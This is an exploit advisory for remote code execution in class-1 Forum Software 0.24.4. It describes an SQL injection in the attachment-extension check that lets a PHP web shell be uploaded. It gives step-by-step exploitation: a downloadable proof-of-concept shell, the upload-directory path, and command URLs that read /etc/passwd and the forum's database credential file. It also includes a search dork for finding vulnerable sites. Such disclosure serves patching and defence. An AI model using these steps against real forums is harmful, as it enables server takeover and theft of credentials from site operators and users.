class-1 Forum Software v 0.24.4 Remote code execution software: site: http://www.class1web.co.uk/software description: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed under the GNU General Public License which means that its source is freely-distributed and available to the general public. vulnerability: the way the forum checks attachment extensions… look at the vulnerable code at viewforum.php 256-272 lines. nothing seems so strange, but… what happen if you try to upload a file with this name? : shell.php.’ or ‘a’ =’a [1] SQL INJECTION! The query and other queries like this become: SELECT * FROM [extensions table name] WHERE extension=” or ‘a’ =’a’ AND file_type=’Image’ you have bypassed the check… now an executable file is uploaded, because for Apache, both on Windows and Linux a file with that name is an executable php file… you can download a poc file from my site, at url: http://rgod.altervista.org/shell.zip inside we have: you can do test manually, unzip the file, register, login, post this file as attachment, then go to this url to see the directory where the attachment has been uploaded: http://[target]/[path]/viewattach.php you will be redirected to: http://[target]/[path]/[upload_dir]/ then launch commands: http://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20./../db_config.inc to see database username and password and so on… you can see my poc exploit at this url: http://www.rgod.altervista.org/class1.html googledork: “Powered by and copyright class-1″ rgod site: http://rgod.altervista.org mail: retrogod [at] aliceposta . it